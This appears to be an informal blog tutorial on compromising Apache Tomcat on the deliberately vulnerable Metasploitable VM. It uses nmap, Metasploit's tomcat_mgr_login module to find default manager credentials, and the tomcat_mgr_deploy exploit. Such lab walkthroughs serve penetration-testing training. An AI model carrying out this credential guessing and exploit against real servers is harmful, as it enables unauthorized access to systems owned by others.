How to Exploit Apache Tomacat Server Using MSF??

Hello Friends,

Today i am showing you how to exploit apache tomcat machine.

Basic setup we require is

1.VMWare Workstation

2.Metasploitable (Download Here: http://sourceforge.net/projects/metasploitable/)

3.Kali Linux or Backtrack 5R3

Steps

Start Metasploitable and Kali Linux in VMWare Workstation and see their IP S

Scan Metasploitable IP In Kali Linux using NMAP tool

nmap -sV 192.168.230.133 (Metasploitable IP)

then we will get all services running and versions of service on the target machine 

we finded that "Apache Tomcat" is running on the port number 8180

Now search for related exploit

In kali linux start metasploit and type "search tomcat"

msf>search tomcat

In this select for best exploit

Here " exploit/multi/http/tomcat_mgr_deploy " is excellent

so go with that only , but before going for exploit know about that exploit

To know information about exploit

msf > info exploit/multi/http/tomcat_mgr_deploy

for this exploit to run we require USERNAME and PASSWORD of tomcat server that we do not having

so next once again come to msf

msf > search tomcat

here you having one auxillary that may help in getting USERNAME and PASSWORD

msf > info auxiliary/scanner/http/tomcat_mgr_login

msf > use auxiliary/scanner/http/tomcat_mgr_login

and set RHOST,RPORT and type run (not exploit , we are running auxiliary not the exploit)

 Now you will get the USERNAME and PASSWORD of tomcat

we got the username = tomcat and password = tomcat

After getting username and password use exploit

 Now set all options like RHOST etc

 Now type EXPLOIT

that's it 

image by:-hdbdhacker